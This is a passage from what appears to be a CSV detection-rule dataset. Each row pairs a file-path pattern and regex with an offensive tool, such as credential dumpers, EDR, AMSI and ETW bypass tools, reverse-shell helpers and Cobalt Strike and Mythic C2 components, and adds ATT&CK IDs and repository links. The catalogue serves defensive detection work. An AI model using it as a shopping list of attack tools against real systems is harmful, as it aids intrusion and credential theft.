T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*/p2p-conficker.nse*",".{0,1000}\/p2p\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/package/portscan/*.go",".{0,1000}\/package\/portscan\/.{0,1000}\.go","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1502","215","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" "*/PackMyPayload.git*",".{0,1000}\/PackMyPayload\.git.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*/PackMyPayload/*",".{0,1000}\/PackMyPayload\/.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*/pacu.git*",".{0,1000}\/pacu\.git.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/padre/pkg/exploit*",".{0,1000}\/padre\/pkg\/exploit.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*/paensy.cpp*",".{0,1000}\/paensy\.cpp.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","137","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" "*/pamspy -p *",".{0,1000}\/pamspy\s\-p\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/pamspy.git*",".{0,1000}\/pamspy\.git.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/papacat.bat",".{0,1000}\/papacat\.bat","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/papacat.ps1*",".{0,1000}\/papacat\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/papacat.zip*",".{0,1000}\/papacat\.zip.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","1","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "*/paranoidninja/*",".{0,1000}\/paranoidninja\/.{0,1000}","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","186","65","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z" "*/Parasite Invoke.exe*",".{0,1000}\/Parasite\sInvoke\.exe.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*/Parasite%20Invoke.exe",".{0,1000}\/Parasite\%20Invoke\.exe","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*/Parasite-Invoke.git*",".{0,1000}\/Parasite\-Invoke\.git.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*/parrot/iso/*.iso*",".{0,1000}\/parrot\/iso\/.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/parrot-mirror/*",".{0,1000}\/parrot\-mirror\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/parrot-on-docker/*",".{0,1000}\/parrot\-on\-docker\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/parrotsec/*",".{0,1000}\/parrotsec\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ParsedMalleableData.txt*",".{0,1000}\/ParsedMalleableData\.txt.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*/parsers/nessus.py*",".{0,1000}\/parsers\/nessus\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/pass_gen.pl*",".{0,1000}\/pass_gen\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/PassDetective.git*",".{0,1000}\/PassDetective\.git.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","7","2","107","8","2024-04-25T12:51:21Z","2023-07-22T12:31:57Z" "*/passhash.sl*",".{0,1000}\/passhash\.sl.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","2","110","24","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z" "*/passive_sqli.txt*",".{0,1000}\/passive_sqli\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/PassTheCert.exe*",".{0,1000}\/PassTheCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/PassTheCert.git*",".{0,1000}\/PassTheCert\.git.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*/PassTheChallenge.git*",".{0,1000}\/PassTheChallenge\.git.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","1","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*/PassTheChallenge/Constants.h*",".{0,1000}\/PassTheChallenge\/Constants\.h.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*/PassTheChallenge/Protocol_h.h*",".{0,1000}\/PassTheChallenge\/Protocol_h\.h.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*/passwd.py*",".{0,1000}\/passwd\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/passwd_tracer.c*",".{0,1000}\/passwd_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","8","713","108","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/password.lst*",".{0,1000}\/password\.lst.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/password/mimipenguin/*",".{0,1000}\/password\/mimipenguin\/.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*/password_brute.txt*",".{0,1000}\/password_brute\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/password_cracker.py*",".{0,1000}\/password_cracker\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/password_ruled.txt*",".{0,1000}\/password_ruled\.txt.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*/passwordcracker.Dockerfile*",".{0,1000}\/passwordcracker\.Dockerfile.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/passwordcracker/*",".{0,1000}\/passwordcracker\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/Passwords.docx*",".{0,1000}\/Passwords\.docx.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*/patch_amsi.exe*",".{0,1000}\/patch_amsi\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/patch_etw.exe*",".{0,1000}\/patch_etw\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/patchfinder64.*",".{0,1000}\/patchfinder64\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/PatchingAPI.cpp*",".{0,1000}\/PatchingAPI\.cpp.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/PatchingAPI.exe*",".{0,1000}\/PatchingAPI\.exe.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","1","N/A","9","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*/path_traversal.txt*",".{0,1000}\/path_traversal\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/path_traversal_dict.txt*",".{0,1000}\/path_traversal_dict\.txt.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","1","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*/path_traversal_win32.txt*",".{0,1000}\/path_traversal_win32\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/path-mtu.nse*",".{0,1000}\/path\-mtu\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/payload.exe*",".{0,1000}\/payload\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*/payload_placement.exe*",".{0,1000}\/payload_placement\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/payload_scripts*",".{0,1000}\/payload_scripts.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/payload_scripts/artifact*",".{0,1000}\/payload_scripts\/artifact.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/payload_service.sh*",".{0,1000}\/payload_service\.sh.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 